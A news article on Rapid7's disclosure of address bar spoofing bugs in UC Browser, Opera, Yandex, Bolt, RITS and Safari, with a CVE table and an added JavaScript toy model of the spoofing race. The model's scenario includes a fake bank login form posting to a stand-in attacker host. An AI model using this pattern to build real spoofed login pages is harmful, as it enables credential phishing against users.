Mobile browsers hit by address bar spoofing vulnerabilities

Cybersecurity company Rapid7 has disclosed address bar spoofing vulnerabilities in several smartphone browsers. When exploited, these bugs let an attacker show a victim a bogus page under a trusted URL, so the victim has no visible cue that the page is fake. Ten vulnerabilities affect seven mobile browsers, including some widely used ones: UC Browser, Opera Mini, Opera Touch, Yandex Browser, Bolt Browser, RITS Browser, and Apple Safari.

Although the bugs differ in their details, they all have the same effect: address bar spoofing. An attacker can make the browser display the URL of a legitimate website while the page actually rendered is malicious. The attacker does not need to compromise the legitimate site; instead, the attacker abuses a bug in the browser itself so that the address bar shows the wrong URL. Because users judge whether a site is genuine by looking at the URL in the address bar, and because the address bar is the one indicator page content cannot normally touch, address bar spoofing deceives users easily. That is why browser vendors need to stay vigilant about any bug that can desynchronise the displayed URL from the rendered document.
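To make the design point concrete, here is an added illustration. It is not code from this article, from Rapid7, or from Rafay Baloch's proof-of-concept, and it is not how any browser listed here is implemented (the article does not describe the mechanism of the individual bugs). It is a toy JavaScript model of an address bar with two update policies: "on-request" changes the displayed URL as soon as a page asks to navigate, so while the target is slow or unreachable the bar shows one origin while the old page's script still controls what is rendered; "on-commit" changes the bar only once a response for that URL has actually been committed. The origins attacker.example and bank.example are constructed samples.

```javascript
// Toy model of a browser address bar (added illustration; not the code of
// any browser named in the article, nor Rafay Baloch's proof-of-concept).
class AddressBarModel {
  // policy: 'on-request' updates the bar when navigation is requested,
  //         'on-commit'  updates it only when a response for that URL commits.
  constructor(policy, startUrl) {
    this.policy = policy;
    this.displayedUrl = startUrl;  // what the user sees in the bar
    this.documentUrl = startUrl;   // origin of the document actually rendered
    this.documentBody = '';        // visible content
    this.pendingUrl = null;        // navigation in flight, if any
  }

  // Script on the current page asks the browser to navigate elsewhere.
  requestNavigation(url) {
    this.pendingUrl = url;
    if (this.policy === 'on-request') {
      this.displayedUrl = url;     // bar changes before any byte has arrived
    }
  }

  // Outcome of the pending load: committed (true) or failed, e.g. unreachable
  // port or timeout (false). Only a commit swaps the rendered document.
  networkResult(committed) {
    if (committed) {
      this.documentUrl = this.pendingUrl;
      this.documentBody = '<real page for ' + this.pendingUrl + '>';
      this.displayedUrl = this.pendingUrl;  // both policies agree once committed
    } else if (this.policy === 'on-request') {
      this.displayedUrl = this.documentUrl; // revert, but only after the window closed
    }
    this.pendingUrl = null;
  }

  // Script of the page still in control keeps writing into the visible document.
  scriptWrite(html) {
    this.documentBody = html;
  }

  // The invariant a browser must keep: the bar shows the origin of what the user sees.
  isConsistent() {
    return this.displayedUrl === this.documentUrl;
  }
}

// Scenario: an attacker-controlled page (constructed sample origin) requests a
// navigation to a trusted URL that answers slowly or not at all, then repaints
// its own body to look like that site's login page while the load is pending.
function spoofScenario(policy) {
  const bar = new AddressBarModel(policy, 'https://attacker.example/');
  bar.requestNavigation('https://bank.example/login');   // hypothetical target
  bar.scriptWrite('<form action="https://attacker.example/steal">Fake bank login</form>');
  return {
    displayedUrl: bar.displayedUrl,   // what the victim reads in the bar
    documentUrl: bar.documentUrl,     // who really controls the page
    body: bar.documentBody,
    consistent: bar.isConsistent(),
  };
}

console.log('on-request:', spoofScenario('on-request'));
console.log('on-commit: ', spoofScenario('on-commit'));
```

Under the weak policy the snapshot shows https://bank.example/login in the bar above a form that posts to the attacker, which is the shape of every bug in the table below; under the strict policy the bar still reads attacker.example until a real response commits. Real browsers are far more complex, but any code path that updates the bar on a pending, failed, or scripted navigation before the document changes is a candidate for this class of bug.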

According to Rafay Baloch, the security researcher who discovered the bugs: “First and foremost, it is easy to persuade the victim into stealing credentials or distributing malware when the address bar points to a trusted website and giving no indicators of forgery; secondly, since the vulnerability exploits a specific feature in a browser, it can evade several anti-phishing schemes and solutions.”

The vulnerabilities were first found by Pakistani security researcher Rafay Baloch, who published technical descriptions and proof-of-concept (PoC) code for the bugs in an article. Rapid7 then coordinated with Baloch to report the vulnerabilities to the respective vendors, who were given a 60-day window to fix them before disclosure. Apple and Opera Touch users are safe, since both vendors responded quickly: Apple fixed Safari on Sept. 16, 2020, and Opera fixed Opera Touch in version 2.4.5 on Sept. 15, 2020.

Opera Mini still awaits a patch, which Opera has committed to ship on November 11, 2020. Yandex and RITS both responded before public disclosure and committed to fixes in subsequent browser updates (Yandex published its fix in version 20.8.4 on Oct. 1). UC Browser users should be cautious, however: UCWeb did not respond to the bug report during the disclosure window, so it was unclear whether or when the bugs would be fixed; the table below records a fix in v13.3.2 on Oct. 21, 2020. Bolt Browser's support address bounced, so Rapid7 alerted Apple product security instead.

Affected browsers, as reported by Rapid7

CVE | Vendor | Browser | Version tested | Platform | Status
CVE-2020-7363 | UCWeb | UC Browser | 13.0.8 | Android | Fixed in v13.3.2 on Oct. 21, 2020
CVE-2020-7364 | UCWeb | UC Browser | 13.0.8 | Android | Fixed in v13.3.2 on Oct. 21, 2020
CVE TBD (Opera) | Opera | Opera Mini | 51.0.2254 | Android | Fix expected from vendor Nov. 11, 2020
CVE TBD (Opera) | Opera | Opera Touch | 2.4.4 | iOS | Fixed in version 2.4.5, released Sept. 15, 2020
CVE TBD (Opera) | Opera | Opera Touch | 2.4.4 | iOS | Fixed in version 2.4.5, released Sept. 15, 2020
CVE TBD (Opera) | Opera | Opera Touch | 2.4.4 | iOS | Fixed in version 2.4.5, released Sept. 15, 2020
CVE-2020-7369 | Yandex | Yandex Browser | 20.8 | Android | Automated reply, followed up Oct. 19, 2020; fix published Oct. 1 in version 20.8.4
CVE-2020-7370 | Danyil Vasilenko | Bolt Browser | 1.4 | iOS | Support email bounced; Rapid7 alerted Apple product security
CVE-2020-7371 | Raise IT Solutions | RITS Browser | 3.3.9 | Android | Fix expected Oct. 19, 2020
CVE-2020-9987 | Apple | Safari | iOS 13.6 | iOS | Fix released Sept. 16, 2020

Opera Touch appears three times because three separate bugs were reported against the same version; Opera had not assigned CVE identifiers to its entries at the time of publication.
